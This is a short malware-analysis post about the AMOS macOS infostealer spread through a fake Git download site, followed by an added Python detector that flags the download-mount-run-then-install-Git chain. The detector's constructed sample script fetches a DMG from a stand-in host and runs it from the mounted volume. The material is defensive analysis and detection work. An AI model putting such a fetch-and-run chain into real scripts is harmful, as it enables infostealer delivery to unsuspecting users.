
Bhargav Rathod
@malwr4n6
Published: March 20, 2025
Happened to analyze a suspicious macOS file. A developer downloaded Git from a git lookalike domain. Turns out to be #AMOS :) Thanks to @obje tool Lulu @patrickwardle Check out for more in the thread #macos #malwareanalysis #malware #infostealer
Turns out this bash script downloads a dmg file, mounts it, executes it and then installs legit git via homebrew! Nice trick to fool a user 😈
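A static triage check for the script behaviour described in the thread, as an added example that is not part of the original post or the analysed sample: it flags a shell script that fetches a .dmg, mounts it, runs something from the mounted volume and then installs Git with Homebrew, in that order. The command names matched (curl/wget, hdiutil, /Volumes, brew) and both sample scripts are assumptions constructed for illustration.

```python
import re

# Stage patterns in the order the post describes them. The concrete commands
# are assumptions about how such a script is written on macOS; the post does
# not show the script itself.
STAGES = [
    ("download_dmg", re.compile(r"\b(?:curl|wget)\b.*\.dmg\b")),
    ("mount_dmg", re.compile(r"\bhdiutil\s+(?:attach|mount)\b")),
    ("run_from_volume",
     re.compile(r"^(?:sudo\s+)?(?:open\s+|sh\s+|bash\s+)?[\"']?/Volumes/")),
    ("decoy_git_install", re.compile(r"\bbrew\s+install\b.*\bgit\b")),
]

# Constructed sample inputs (not taken from the analysed file).
SUSPECT_SAMPLE = """#!/bin/bash
curl -fsSL -o /tmp/pkg.dmg https://lookalike.example.invalid/pkg.dmg
hdiutil attach -nobrowse /tmp/pkg.dmg
/Volumes/pkg/installer
brew install git
"""
BENIGN_SAMPLE = """#!/bin/bash
brew update
brew install git
git --version
"""

def stage_hits(script_text):
    """Map each stage name to the first line number where it appears."""
    hits = {}
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):  # skip blanks, comments, shebang
            continue
        for name, pattern in STAGES:
            if name not in hits and pattern.search(line):
                hits[name] = lineno
    return hits

def triage(script_text):
    """Return (verdict, hits); the full chain must appear in order."""
    hits = stage_hits(script_text)
    order = [hits[name] for name, _ in STAGES if name in hits]
    if len(hits) == len(STAGES) and order == sorted(order):
        return "decoy-installer chain", hits
    if "download_dmg" in hits and "run_from_volume" in hits:
        return "dmg fetch-and-run", hits
    return "no match", hits
```

A plain `brew install git` script does not trigger the check; it is the combination with the DMG download, mount and execution steps that is flagged.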